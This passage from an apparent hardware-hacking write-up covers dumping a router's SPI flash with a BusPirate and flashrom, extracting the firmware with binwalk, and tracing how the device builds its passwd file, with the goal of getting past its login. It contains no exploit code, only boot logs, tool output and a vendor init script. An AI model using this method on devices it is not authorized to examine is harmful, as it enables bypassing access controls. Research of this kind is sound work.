TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
squashfs: version 4.0 (2009/01/31) Phillip Lougher
squashfs: version 4.0 with LZMA457 ported by BRCM
JFFS2 version 2.2. (NAND) © 2001-2006 Red Hat, Inc.
msgmni has been set to 119
io scheduler noop registered (default)
pcieport-driver 0000:01:00.0: device [14e4:6328] has invalid IRQ; check vendor BIOS
PCI: Setting latency timer of device 0000:01:00.0 to 64
Gateway flash mapping
flash mapping initialized
Creating 4 MTD partitions on "thomson-spi":
0x000000040000-0x0000000b0000 : "userfs"
0x000000020000-0x000000040000 : "mtdss"
0x000000180000-0x000000800000 : "rootfs"
0x0000000b0000-0x000000180000 : "kernel"
brcmboard: brcm_board_init entry
Serial: BCM63XX driver $Revision: 3.00 $
ttyS0 at MMIO 0xb0000100 (irq = 36) is a BCM63XX
ttyS1 at MMIO 0xb0000100 (irq = 36) is a BCM63XX
ttyS2 at MMIO 0xb0000120 (irq = 47) is a BCM63XX
TCP cubic registered
NET: Registered protocol family 17
NET: Registered protocol family 15
VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
Freeing unused kernel memory: 108k freed
init started:  BusyBox v1.00 (2012.03.26-10:27+0000) multi-call binary
init started:  BusyBox v1.00 (2012.03.26-10:27+0000) multi-call binary
Starting pid 116, console /dev/ttyS0: '/etc/init.d/rcS'
Initializing random number generator
Using /lib/modules/kserport.ko
kserport: module license 'unspecified' taints kernel.
Disabling lock debugging due to kernel taint
Using /nmon/nmon.ko
loading geniodb kernel modules...
Using /lib/modules/geniodb.ko
 geniodb driver: Loading ...
 geniodb driver: Loading finished with SUCCESS
Button char device has been created and initialized.
[BCM ADSL] BcmAdsl_SetOverlayMode = 85 new=0
tmm_skb_desc.queuesize = 300
queue: 0xc09aa744
queue: 0xc09aa744, rp: 0xc09aa744, wp: 0xc09aa744
[BCM ADSL] ------    dslFileLoadImage : OverlayMode = 0 fname=ZXD3AA
pci 0000:00:09.0: firmware: requesting ZXD3AA
pSdramPHY=0xA3FFFFF8, 0x5CF9A 0xDEADBEEF
[BCM ADSL] Firmware load : 548088 548088 LMEM=(0xB0D80000, 11380) SDRAM=(0xA3F00000, 536700)
pci 0000:00:09.0: firmware: requesting phy
*** PhySdramSize got adjusted: 0x8307C => 0x98A20 ***
AdslCoreSharedMemInit: shareMemAvailable=423360
AdslCoreHwReset:  pLocSbSta=c09a2fd0 bkupThreshold=1600
AdslCoreHwReset:  AdslOemDataAddr = 0xA3F78090
[DSL driver] !-!-!-!-!-!-! ***** AFE ID = 0x1040a200
ADSL PHY version is A2pDT002a.d23k
b6w_init
FOUND WL DEVICE 0, bus=2, device=0, func=0, vendorid=14E4, deviceid=A8DC, regaddr=10F00000, irq=31
wl:srom not detected, using main memory mapped srom info(wombo board)
veth0 (): not using net_device_ops yet
NET: Registered protocol family 3
NET: Registered protocol family 9
NET: Registered protocol family 6
NET: Registered protocol family 4
NET: Registered protocol family 5
NET: Registered protocol family 18
NET: Registered protocol family 25
Device ipsec not present.
voice will be loaded
Device endpoint not present.
Device ikanos not present.
Starting pid 338, console /dev/ttyS0: '/etc/init.d/rc'
Switching to RUNLEVEL 1 ...
Disabling hotplug helper
route: SIOC[ADD|DEL]RT: File exists
linux application start ...
wait for linux_appl to initialize (1)
wait for linux_appl to initialize (2)
************* ERROR RECORD *************
000000:00:00.000000
Application NMON started after POWERON.
****************** END *****************
wait for linux_appl to initialize (3)
appl_init: BUILD VERIFIED!
wait for linux_appl to initialize (4)
[SS EMUL] ERR: opening config file /active/ss.conf failed
End of initialisation
wait for linux_appl to initialize (5)
 start fseventd ...
 fseventd is started.
 start storagepl ...
 storagepl is started
 start vfspl ...
 vfspl is started
MVFS plugin started
cifs plug-in: initializing ...
 cifs plug-in is started
upnpavpl start ...
/usr/bin/fusermount
Loading fuse modulefuse init (API version 7.11)
.
Mounting fuse control filesystem.
linuxappl: start loading after [  4459ms ]
WARNING: Unknown Parameter Type ifmfilter
WARNING: Unknown Parameter Type ifmfilter
S67stopload: wait until configuration load reaches phase 9...
S67stopload: wait until configuration load reaches phase 9 (now -1, 1s)
adsl: adsl_open entry
ADSL Line state is: DOWN
[adsl] trace = 5 0
S67stopload: wait until configuration load reaches phase 9 (now -1, 2s)
The OBC bridge interface cannot be removed from this VLAN, because OBC is defined as untagged.
S67stopload: wait until configuration load reaches phase 9 (now 3, 3s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 4s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 5s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 6s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 7s)
DyingGasp RIP BIT is set!
[ERROR : [DIAG 1004] -1 ]
ADSL configuration:
        adslmultimode = adsl2plus
        syslog = disabled
S67stopload: wait until configuration load reaches phase 9 (now 3, 8s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 9s)
The OBC bridge interface cannot be removed from this VLAN, because OBC is defined as untagged.
Option not allowed => HostNotLocalDomain
Unsupported URL. The url must include http:// or https://.
Failed to add host 9c:97:26:0c:0c:e9
S67stopload: wait until configuration load reaches phase 9 (now 6, 10s)
S67stopload: wait until configuration load reaches phase 9 (now 6, 11s)
S67stopload: wait until configuration load reaches phase 9 (now 6, 12s)
S67stopload: configuration load reached phase 9...
Intel MicroStack 1.0 - Digital Media Server (DLNA 1.5)(pid = 835),
loc_generate_uuid:25e05aa9-8206-5b77-9aad-d5547194a957
nlplugd start ...
Initializing.
Starting netlink plugin
Daemonize netlink plugin
udhcpcd start ...
monitoripd start ...
anti_spoofd start ...
anti_spoofd : process exit !
 start mud ...
Using /lib/modules/2.6.30/kernel/drivers/usb/host/ehci-hcd.ko
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
PCI: Enabling device 0000:00:0a.0 (0000 -> 0002)
PCI: Setting latency timer of device 0000:00:0a.0 to 64
ehci_hcd 0000:00:0a.0: EHCI Host Controller
ehci_hcd 0000:00:0a.0: new USB bus registered, assigned bus number 1
ehci_hcd 0000:00:0a.0: Enabling legacy PCI PM
ehci_hcd 0000:00:0a.0: irq 50, io mem 0x10002500
ehci_hcd 0000:00:0a.0: USB f.f started, EHCI 1.00
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
Using /lib/modules/2.6.30/kernel/drivers/usb/host/ohci-hcd.ko
ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
PCI: Enabling device 0000:00:09.0 (0000 -> 0002)
PCI: Setting latency timer of device 0000:00:09.0 to 64
ohci_hcd 0000:00:09.0: OHCI Host Controller
ohci_hcd 0000:00:09.0: new USB bus registered, assigned bus number 2
ohci_hcd 0000:00:09.0: irq 49, io mem 0x10002600
usb usb2: configuration #1 chosen from 1 choice
hub 2-0:1.0: USB hub found
hub 2-0:1.0: 1 port detected
Using /lib/modules/2.6.30/kernel/drivers/usb/class/usblp.ko
usbcore: registered new interface driver usblp
Using /lib/modules/2.6.30/kernel/drivers/usb/serial/usbserial.ko
usbcore: registered new interface driver usbserial
USB Serial support registered for generic
usbcore: registered new interface driver usbserial_generic
usbserial: USB Serial Driver core
Using /lib/modules/2.6.30/kernel/drivers/scsi/scsi_mod.ko
SCSI subsystem initialized
Using /lib/modules/2.6.30/kernel/drivers/scsi/sd_mod.ko
Driver 'sd' needs updating - please use bus_type methods
Using /lib/modules/2.6.30/kernel/drivers/usb/storage/usb-storage.ko
Initializing USB Mass Storage driver...
usbcore: registered new interface driver usb-storage
USB Mass Storage support registered.
Using /lib/modules/2.6.30/kernel/fs/fat/fat.ko
Using /lib/modules/2.6.30/kernel/fs/fat/vfat.ko
Using /lib/modules/2.6.30/kernel/fs/nls/nls_cp437.ko
Using /lib/modules/2.6.30/kernel/fs/nls/nls_iso8859-1.ko
Using /lib/modules/2.6.30/kernel/fs/nls/nls_cp850.ko
Name: /etc/usbmgr/usbmgr.conf
Starting power manager...
Username :

After boot we get the good old login prompt, but without a valid username and password there's not much we can do. One way forward is to inspect the filesystem offline, where no access control applies. The filesystem can be obtained by dumping it directly from the flash memory.

Dumping the flash

Reading the flash memory contents is not overly complicated, but it requires some understanding of how integrated circuits work and of how to obtain the raw contents of the chip using the same interfaces and protocols the main CPU uses during normal operation of the device.

For this purpose we're targeting the flash memory chip that was inspected above: a Spansion FL064PIF, whose datasheet is available on the manufacturer's site.

In order to read (and eventually write) its contents, we need to interface with the chip itself through its pins, using a serial protocol named SPI. The useful pins are Vcc, CS, SO, SI, SCK and GND; they are described in the datasheet.
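To make the SPI exchange a little more concrete, here is a minimal sketch of the bytes a programmer would clock into SI to start a read. It assumes the common SPI NOR convention of a `0x03` read opcode followed by a 24-bit big-endian address, and an 8 MiB (64 Mbit) part; both are assumptions to be confirmed against the datasheet, and `build_read_command` is a hypothetical helper, not something flashrom exposes.

```python
# Assumed values: confirm both against the chip's datasheet.
READ_OPCODE = 0x03             # conventional SPI NOR "read data" opcode
FLASH_SIZE = 8 * 1024 * 1024   # 64 Mbit part, i.e. 8 MiB


def build_read_command(address: int) -> bytes:
    """Return the opcode plus 3 address bytes (MSB first) for a read."""
    if not 0 <= address < FLASH_SIZE:
        raise ValueError(f"address {address:#x} is outside the flash")
    return bytes([READ_OPCODE]) + address.to_bytes(3, "big")


if __name__ == "__main__":
    # After these 4 bytes, the chip shifts data out on SO while CS stays low.
    print(build_read_command(0x000000).hex())
```

In practice flashrom issues these commands for us; the sketch only shows what travels over the wires.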


Dumping the chip can be done with a BusPirate and Flashrom. To avoid any desoldering, we'll use a Pomona SOIC clip, model 5252. In this case, power will be supplied by the BusPirate itself and the board must be switched off, because we don't want the main CPU to interfere with the memory chip while we're dumping its contents.


In-system programming

In this case we were lucky, because powering up the chip didn't wake up any other component on the board, such as the main CPU. This can happen: it depends on how the board is designed and how the components are connected, and it varies from board to board. If there is such interference you'll end up with a corrupted dump, and flashrom won't alert you. This is why it's good practice to verify the correctness of the dump.
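One simple way to gain confidence in a dump is to read the chip more than once and check that the results are identical. The sketch below is one possible approach, not necessarily the check used here: it hashes two dump files and compares the digests. The file names are hypothetical.

```python
import hashlib


def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large dumps don't need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def dumps_match(first_path: str, second_path: str) -> bool:
    """True when two independent reads of the chip are byte-identical."""
    return sha256_of(first_path) == sha256_of(second_path)


if __name__ == "__main__":
    # Hypothetical file names for two consecutive reads of the same chip.
    print(dumps_match("dump1.bin", "dump2.bin"))
```

Matching reads don't prove the dump is correct, but differing reads are a strong sign that something on the board is interfering.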

Figure: Dumping the flash
Figure: Verifying the dump

We now have the entire content of the flash memory: the bootloader, the Linux kernel and, most interesting, the root filesystem. In short, we have the entire software stack the manufacturer deployed on the device.

Firmware extraction

For the extraction we will use the Binwalk utility. It will read the dump and try to recognize and extract any known file format.

[email protected]:~/Projects/tg582n# binwalk dump.bin 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
45066         0xB00A          LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 250804 bytes
132350        0x204FE         PEM certificate
133927        0x20B27         PEM certificate
135518        0x2115E         PEM certificate
262144        0x40000         JFFS2 filesystem, big endian
262496        0x40160         Zlib compressed data, compressed
262760        0x40268         JFFS2 filesystem, big endian
267824        0x41630         Zlib compressed data, compressed
269016        0x41AD8         Zlib compressed data, compressed
269332        0x41C14         Zlib compressed data, compressed
269648        0x41D50         Zlib compressed data, compressed
269844        0x41E14         JFFS2 filesystem, big endian
269960        0x41E88         Zlib compressed data, compressed
270176        0x41F60         Zlib compressed data, compressed
270444        0x4206C         Zlib compressed data, compressed
270892        0x4222C         Zlib compressed data, compressed
271452        0x4245C         Zlib compressed data, compressed
271552        0x424C0         JFFS2 filesystem, big endian
272436        0x42834         Zlib compressed data, compressed
273012        0x42A74         Zlib compressed data, compressed
273548        0x42C8C         Zlib compressed data, compressed
273888        0x42DE0         Zlib compressed data, compressed
274424        0x42FF8         Zlib compressed data, compressed
274764        0x4314C         Zlib compressed data, compressed
275300        0x43364         Zlib compressed data, compressed
275640        0x434B8         Zlib compressed data, compressed
276136        0x436A8         Zlib compressed data, compressed
276476        0x437FC         Zlib compressed data, compressed
277052        0x43A3C         Zlib compressed data, compressed
277268        0x43B14         Zlib compressed data, compressed
277536        0x43C20         Zlib compressed data, compressed
278608        0x44050         Zlib compressed data, compressed
279672        0x44478         Zlib compressed data, compressed
280084        0x44614         JFFS2 filesystem, big endian
280200        0x44688         Zlib compressed data, compressed
280684        0x4486C         JFFS2 filesystem, big endian
280872        0x44928         Zlib compressed data, compressed
281124        0x44A24         Zlib compressed data, compressed
281240        0x44A98         Zlib compressed data, compressed
281336        0x44AF8         Zlib compressed data, compressed
281432        0x44B58         Zlib compressed data, compressed
281460        0x44B74         JFFS2 filesystem, big endian
281676        0x44C4C         Zlib compressed data, compressed
281768        0x44CA8         Zlib compressed data, compressed
281864        0x44D08         Zlib compressed data, compressed
281960        0x44D68         Zlib compressed data, compressed
282056        0x44DC8         Zlib compressed data, compressed
282176        0x44E40         Zlib compressed data, compressed
282300        0x44EBC         Zlib compressed data, compressed
282668        0x4502C         JFFS2 filesystem, big endian
282808        0x450B8         Zlib compressed data, compressed
282932        0x45134         Zlib compressed data, compressed
283152        0x45210         JFFS2 filesystem, big endian
283772        0x4547C         Zlib compressed data, compressed
284068        0x455A4         Zlib compressed data, compressed
284624        0x457D0         JFFS2 filesystem, big endian
285552        0x45B70         Zlib compressed data, compressed
286000        0x45D30         JFFS2 filesystem, big endian
286764        0x4602C         Zlib compressed data, compressed
287224        0x461F8         JFFS2 filesystem, big endian
288020        0x46514         Zlib compressed data, compressed
288456        0x466C8         JFFS2 filesystem, big endian
289736        0x46BC8         Zlib compressed data, compressed
290484        0x46EB4         JFFS2 filesystem, big endian
291892        0x47434         Zlib compressed data, compressed
292352        0x47600         JFFS2 filesystem, big endian
293416        0x47A28         Zlib compressed data, compressed
294336        0x47DC0         JFFS2 filesystem, big endian
295984        0x48430         Zlib compressed data, compressed
296564        0x48674         JFFS2 filesystem, big endian
297632        0x48AA0         Zlib compressed data, compressed
298040        0x48C38         JFFS2 filesystem, big endian
299428        0x491A4         Zlib compressed data, compressed
299856        0x49350         JFFS2 filesystem, big endian
300880        0x49750         Zlib compressed data, compressed
301620        0x49A34         JFFS2 filesystem, big endian
303128        0x4A018         Zlib compressed data, compressed
303684        0x4A244         JFFS2 filesystem, big endian
304808        0x4A6A8         Zlib compressed data, compressed
305152        0x4A800         JFFS2 filesystem, big endian
305828        0x4AAA4         Zlib compressed data, compressed
306220        0x4AC2C         JFFS2 filesystem, big endian
306940        0x4AEFC         Zlib compressed data, compressed
307904        0x4B2C0         JFFS2 filesystem, big endian
309392        0x4B890         Zlib compressed data, compressed
309908        0x4BA94         JFFS2 filesystem, big endian
313324        0x4C7EC         Zlib compressed data, compressed
313900        0x4CA2C         Zlib compressed data, compressed
314436        0x4CC44         Zlib compressed data, compressed
314776        0x4CD98         Zlib compressed data, compressed
315312        0x4CFB0         Zlib compressed data, compressed
315652        0x4D104         Zlib compressed data, compressed
316188        0x4D31C         Zlib compressed data, compressed
316528        0x4D470         Zlib compressed data, compressed
317024        0x4D660         Zlib compressed data, compressed
317364        0x4D7B4         Zlib compressed data, compressed
317940        0x4D9F4         Zlib compressed data, compressed
318236        0x4DB1C         Zlib compressed data, compressed
319308        0x4DF4C         Zlib compressed data, compressed
320616        0x4E468         Zlib compressed data, compressed
323744        0x4F0A0         JFFS2 filesystem, big endian
323884        0x4F12C         Zlib compressed data, compressed
323944        0x4F168         JFFS2 filesystem, big endian
591524        0x906A4         Zlib compressed data, compressed
592100        0x908E4         Zlib compressed data, compressed
592808        0x90BA8         Zlib compressed data, compressed
593516        0x90E6C         Zlib compressed data, compressed
594224        0x91130         Zlib compressed data, compressed
594892        0x913CC         Zlib compressed data, compressed
595468        0x9160C         Zlib compressed data, compressed
595764        0x91734         Zlib compressed data, compressed
596836        0x91B64         Zlib compressed data, compressed
598144        0x92080         Zlib compressed data, compressed
599460        0x925A4         Zlib compressed data, compressed
600036        0x927E4         Zlib compressed data, compressed
600744        0x92AA8         Zlib compressed data, compressed
601452        0x92D6C         Zlib compressed data, compressed
602160        0x93030         Zlib compressed data, compressed
602828        0x932CC         Zlib compressed data, compressed
603404        0x9350C         Zlib compressed data, compressed
603700        0x93634         Zlib compressed data, compressed
604772        0x93A64         Zlib compressed data, compressed
606080        0x93F80         Zlib compressed data, compressed
606568        0x94168         JFFS2 filesystem, big endian
607900        0x9469C         Zlib compressed data, compressed
608608        0x94960         Zlib compressed data, compressed
609316        0x94C24         Zlib compressed data, compressed
610024        0x94EE8         Zlib compressed data, compressed
610692        0x95184         Zlib compressed data, compressed
611200        0x95380         JFFS2 filesystem, big endian
611564        0x954EC         Zlib compressed data, compressed
612568        0x958D8         JFFS2 filesystem, big endian
613128        0x95B08         JFFS2 filesystem, big endian
720922        0xB001A         LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 2394632 bytes
1572864       0x180000        Squashfs filesystem, little endian, non-standard signature, version 4.0, compression:gzip, size: 6626892 bytes, 1298 inodes, blocksize: 131072 bytes, created: 2012-10-15 13:38:44

Honestly, this is the first time I've had so many results from binwalk. The first thing I noticed is the SquashFS signature. From the boot log messages, we know that the root filesystem is in that format:

Kernel command line: root=31:0 ro noinitrd memsize=0x3EDD000 console=ttyS0,115200 root=/dev/mtdblock2 rootfstype=squashfs
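Binwalk handles the extraction for us, but the offset and size it reports are enough to carve the SquashFS image by hand. The following is a minimal sketch under that assumption; `carve` is a hypothetical helper, the two constants are copied from the binwalk output above, and the output file name is made up.

```python
SQUASHFS_OFFSET = 0x180000   # from the binwalk listing
SQUASHFS_SIZE = 6626892      # "size: 6626892 bytes" in the same entry


def carve(image: bytes, offset: int, size: int) -> bytes:
    """Return `size` bytes of `image` starting at `offset`."""
    end = offset + size
    if offset < 0 or size < 0 or end > len(image):
        raise ValueError("requested region falls outside the image")
    return image[offset:end]


if __name__ == "__main__":
    with open("dump.bin", "rb") as handle:
        dump = handle.read()
    # Hypothetical output name; the result can be fed to a SquashFS extractor.
    with open("rootfs.squashfs", "wb") as handle:
        handle.write(carve(dump, SQUASHFS_OFFSET, SQUASHFS_SIZE))
```

Note that binwalk flags the signature as non-standard, so a stock SquashFS tool may not accept the carved image without further work.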

So we'll start digging in that directory first:

[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root# ll
total 68K
drwxrwxr-x 15 root root 4,0K ott 15  2012 .
drwxr-xr-x 34 root root  12K gen 20 12:06 ..
drwxrwxr-x  3 root root 4,0K ott 15  2012 archive
drwxrwxrwx  2 root root 4,0K mar 26  2012 bin
drwxrwxrwx  6 root root 4,0K mar 26  2012 dev
lrwxrwxrwx  1 root root    6 mar 26  2012 dl -> /rw/dl
drwxrwxr-x 10 root root 4,0K mar 26  2012 etc
drwxrwxrwx  3 root root 4,0K mar 26  2012 lib
drwxrwxrwx  2 root root 4,0K mar 26  2012 nmon
drwxrwxrwx  2 root root 4,0K mar 26  2012 proc
drwxrwxrwx  3 root root 4,0K mar 26  2012 rw
drwxrwxrwx  2 root root 4,0K mar 26  2012 sbin
drwxrwxrwx  2 root root 4,0K mar 26  2012 sys
lrwxrwxrwx  1 root root    8 mar 26  2012 tmp -> /var/tmp
drwxrwxrwx  2 root root 4,0K mar 26  2012 userfs
drwxrwxrwx  5 root root 4,0K mar 26  2012 usr
drwxrwxrwx  2 root root 4,0K mar 26  2012 var
[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root# 

We're interested in the passwd file but, looking in the /etc directory, we find that, as on most embedded devices, that file is autogenerated and what we see is only a placeholder.

[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root/etc# ll
total 100K
drwxrwxr-x 10 root root 4,0K mar 26  2012 .
drwxrwxr-x 15 root root 4,0K ott 15  2012 ..
-rw-r--r--  1 root root  513 mar 26  2012 advancedservices.conf
-r--r--r--  1 root root  377 mar 26  2012 autoconf.conf
-r--r--r--  1 root root  133 mar 26  2012 autoip.conf
drwxrwxrwx  2 root root 4,0K mar 26  2012 config
-rw-rw-rw-  1 root root  345 mar 26  2012 fileprofiler.conf
-r--r--r--  1 root root   73 mar 26  2012 fstab
-r--r--r--  1 root root   17 mar 26  2012 fuse.conf
lrwxrwxrwx  1 root root   15 mar 26  2012 group -> ../rw/etc/group
lrwxrwxrwx  1 root root   17 mar 26  2012 gshadow -> ../rw/etc/gshadow
-r--r--r--  1 root root   26 mar 26  2012 host.conf
drwxrwxr-x  2 root root 4,0K mar 26  2012 init.d
-r--r--r--  1 root root  513 mar 26  2012 inittab
-r--r--r--  1 root root  17K mar 26  2012 mime.types
lrwxrwxrwx  1 root root   14 mar 26  2012 mtab -> ../proc/mounts
-r--r--r--  1 root root  465 mar 26  2012 nsswitch.conf
lrwxrwxrwx  1 root root   16 mar 26  2012 passwd -> ../rw/etc/passwd
drwxr-xr-x  2 root root 4,0K mar 26  2012 rc0.d
drwxr-xr-x  2 root root 4,0K mar 26  2012 rc1.d
drwxr-xr-x  2 root root 4,0K mar 26  2012 rc2.d
drwxr-xr-x  2 root root 4,0K mar 26  2012 rc3.d
lrwxrwxrwx  1 root root   21 mar 26  2012 resolv.conf -> ../rw/etc/resolv.conf
lrwxrwxrwx  1 root root   16 mar 26  2012 shadow -> ../rw/etc/shadow
drwxrwxr-x  2 root root 4,0K mar 26  2012 udhcpc
drwxrwxrwx  2 root root 4,0K mar 26  2012 usbmgr
-rw-rw-rw-  1 root root    8 mar 26  2012 version
[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root/etc#

The passwd file is a link to another file in the /rw directory which, right now, is empty. How is that file generated at every boot? Which script is in charge of managing it? We need to find the answers...

Hunting for the system users

Poking around in the /etc directory can be useful because, in the end, this is a standard Linux-based system, and something in that directory must reveal which users are allowed on the system.

[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root/etc# tree
.
├── advancedservices.conf
├── autoconf.conf
├── autoip.conf
├── config
│   ├── secrets.tdb -> /rw/etc/secrets.tdb
│   ├── smb.conf -> /rw/etc/smb.conf
│   └── smbpasswd -> /rw/etc/smbpasswd
├── fileprofiler.conf
├── fstab
├── fuse.conf
├── group -> ../rw/etc/group
├── gshadow -> ../rw/etc/gshadow
├── host.conf
├── init.d
│   ├── anti_spoofd
│   ├── autoipd
│   ├── checkd
│   ├── cifs
│   ├── clinkd
│   ├── cryptomount
│   ├── dropbear
│   ├── fseventd
│   ├── fuse
│   ├── initrandom
│   ├── jffs2contentcheck
│   ├── ledstatus
│   ├── linuxappl
│   ├── longops
│   ├── mbusd_util
│   ├── mocad
│   ├── monitoripd
│   ├── mud
│   ├── mvfs
│   ├── mvfspl
│   ├── network
│   ├── nlplugd
│   ├── no_hotplug_helper
│   ├── powermgr
│   ├── print_server
│   ├── pureftp
│   ├── rc
│   ├── rcS
│   ├── rcS.mountfs
│   ├── rcS.ro
│   ├── rssplugin
│   ├── samba
│   ├── stopload
│   ├── storagepl
│   ├── todd
│   ├── udhcpcd
│   ├── upnpavpl
│   ├── usb-host
│   ├── usb_storage
│   └── vfspl
├── inittab
├── mime.types
├── mtab -> ../proc/mounts
├── nsswitch.conf
├── passwd -> ../rw/etc/passwd
├── rc0.d
├── rc1.d
│   ├── K01mvfs -> ../init.d/mvfs
│   ├── S01jffs2contentcheck -> ../init.d/jffs2contentcheck
│   ├── S10no_hotplug_helper -> ../init.d/no_hotplug_helper
│   ├── S20network -> ../init.d/network
│   ├── S21vega -> ../init.d/vega
│   ├── S21wps -> ../init.d/wps
│   ├── S22linuxappl -> ../init.d/linuxappl
│   ├── S41fseventd -> ../init.d/fseventd
│   ├── S45storagepl -> ../init.d/storagepl
│   ├── S45vfspl -> /etc/init.d/vfspl
│   ├── S46mvfspl -> ../init.d/mvfspl
│   ├── S47checkd -> ../init.d/checkd
│   ├── S47cifs -> ../init.d/cifs
│   ├── S48todd -> ../init.d/todd
│   ├── S48upnpavpl -> ../init.d/upnpavpl
│   ├── S49rssplugin -> ../init.d/rssplugin
│   ├── S55fuse -> ../init.d/fuse
│   ├── S56mvfs -> ../init.d/mvfs
│   ├── S67stopload -> ../init.d/stopload
│   ├── S68su_intf -> ../init.d/su_intf
│   ├── S69la_intf -> ../init.d/la_intf
│   ├── S71nlplugd -> ../init.d/nlplugd
│   ├── S72udhcpcd -> ../init.d/udhcpcd
│   ├── S73monitoripd -> ../init.d/monitoripd
│   ├── S74anti_spoofd -> ../init.d/anti_spoofd
│   ├── S80dropbear -> ../init.d/dropbear
│   ├── S97mud -> ../init.d/mud
│   ├── S97usb-host -> ../init.d/usb-host
│   └── S99powermgr -> ../init.d/powermgr
├── rc2.d
├── rc3.d
│   ├── S01jffs2contentcheck -> ../init.d/jffs2contentcheck
│   ├── S10no_hotplug_helper -> ../init.d/no_hotplug_helper
│   ├── S20network -> ../init.d/network
│   ├── S21vega -> ../init.d/vega
│   ├── S22linuxappl -> ../init.d/linuxappl
│   ├── S47checkd -> ../init.d/checkd
│   ├── S67stopload -> ../init.d/stopload
│   ├── S71nlplugd -> ../init.d/nlplugd
│   ├── S72udhcpcd -> ../init.d/udhcpcd
│   ├── S73monitoripd -> ../init.d/monitoripd
│   └── S74anti_spoofd -> ../init.d/anti_spoofd
├── resolv.conf -> ../rw/etc/resolv.conf
├── shadow -> ../rw/etc/shadow
├── udhcpc
│   └── udhcpc.script
├── usbmgr
│   ├── class -> /var/usbmgr/class
│   ├── dextension
│   ├── host -> /var/usbmgr/host
│   ├── preload.conf
│   ├── storage
│   ├── umts_custom
│   ├── update_usbmgrconf
│   ├── usbledctrl
│   ├── usbmgr.conf -> /var/tmp/usbmgr.conf
│   ├── usbmgr.conf.ro
│   └── vendor -> /var/usbmgr/vendor
└── version

From what we can see, the interesting files in the /etc directory are symlinks to their counterparts in /rw and, to me, rw suggests read and write operations. Let's search the configuration files for evidence of this path:

[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root/etc# grep -ir rw
init.d/clinkd:CLINKCONF_DEST=/rw/etc/
init.d/clinkd:    #CPE_P00075123:CJ:Change clink.conf to a rw location
init.d/usb_storage:		# eb 3c 90, we're definitely dealing with a FAT boot sector. Otherwise, we
init.d/usb_storage:    SMBD_STATUS=0 # 0 means that cifs service is stopped (otherwise it is running)
init.d/jffs2contentcheck:#    push down of dl partition content into /rw/dl
init.d/jffs2contentcheck:	# New layout: (USERFS mounted on /rw)
init.d/jffs2contentcheck:	#      /dl --> /rw/dl
init.d/jffs2contentcheck:	if [ "`cat /proc/mounts | grep /dev/mtdblock0 | grep /rw`" ]; then
init.d/jffs2contentcheck:		[ -d /rw/etc ] || mkdir -m 775 /rw/etc
init.d/jffs2contentcheck:		if [ ! -d /rw/dl ]; then
init.d/jffs2contentcheck:			echo " Detected old jffs2 partition layout! Converting /rw to new layout"
init.d/jffs2contentcheck:			mkdir -m 775 /rw/dl
init.d/jffs2contentcheck:			for file in /rw/*; do
init.d/jffs2contentcheck:				([ "${file}" = "/rw/dl" ] || [ "${file}" = "/rw/etc" ]) && continue
init.d/jffs2contentcheck:				mv ${file} /rw/dl/
init.d/jffs2contentcheck:	#     /rw --> /userfs/config-bank-X
init.d/jffs2contentcheck:	#     /dl --> /rw/dl
init.d/jffs2contentcheck:	# Set /rw correctly: since /rw is on rootfs which is read-only, we
init.d/jffs2contentcheck:	mount -o bind $CONFDIR /rw
advancedservices.conf:HDTOOLSDIR="/rw/disk"
advancedservices.conf:FLASHCONFIGDIR="/rw/etc/"
mime.types:application/vnd.vectorworks

We found that clinkd, jffs2contentcheck and advancedservices.conf have something to do with the /rw directory. Let's review this evidence.

  • clinkd: the comment section of the script says "This is the init script for the Entropic clinkd daemon". I wasn't able to find any useful information about this daemon.
  • advancedservices.conf: nothing very interesting here, only a small hint that /rw/etc is the writable part of the flash.
  • jffs2contentcheck: this one is interesting, and the script contains plenty of information. To better understand its purpose, here is the full source, which is actually pretty well commented.
#!/bin/sh

####
# This script checks and converts the layout of the writable partition to its
# latest version.
#
# Changelog:
#  * 7.4.4 > 8.1.1:
#    push down of dl partition content into /rw/dl
#    [Steven Aerts -- 2008/03/12]
####

. /etc/autoconf.conf

start () {

	# Verify 7.4.4 to 8.1.1 userfs migration
	# Old layout: (USERFS mounted on /dl)
	#      USERFS/user.ini
	#      USERFS/etc/...
	#      USERFS/tls/...
	# New layout: (USERFS mounted on /rw)
	#      USERFS/etc/...
	#      USERFS/dl/user.ini
	#      USERFS/dl/tls/...
	#      /dl --> /rw/dl
	if [ "`cat /proc/mounts | grep /dev/mtdblock0 | grep /rw`" ]; then
		[ -d /rw/etc ] || mkdir -m 775 /rw/etc
		if [ ! -d /rw/dl ]; then
			echo " Detected old jffs2 partition layout! Converting /rw to new layout"
			mkdir -m 775 /rw/dl
			for file in /rw/*; do
				([ "${file}" = "/rw/dl" ] || [ "${file}" = "/rw/etc" ]) && continue
				mv ${file} /rw/dl/
			done
		fi
	fi

	# Migrate to dual bank layout
	# New layout: (USERFS mounted on /userfs)
	#     USERFS/config-bank-X/etc/...
	#     USERFS/config-bank-X/dl/...
	#     /rw --> /userfs/config-bank-X
	#     /dl --> /rw/dl
	
	# Determine booted bank from command line
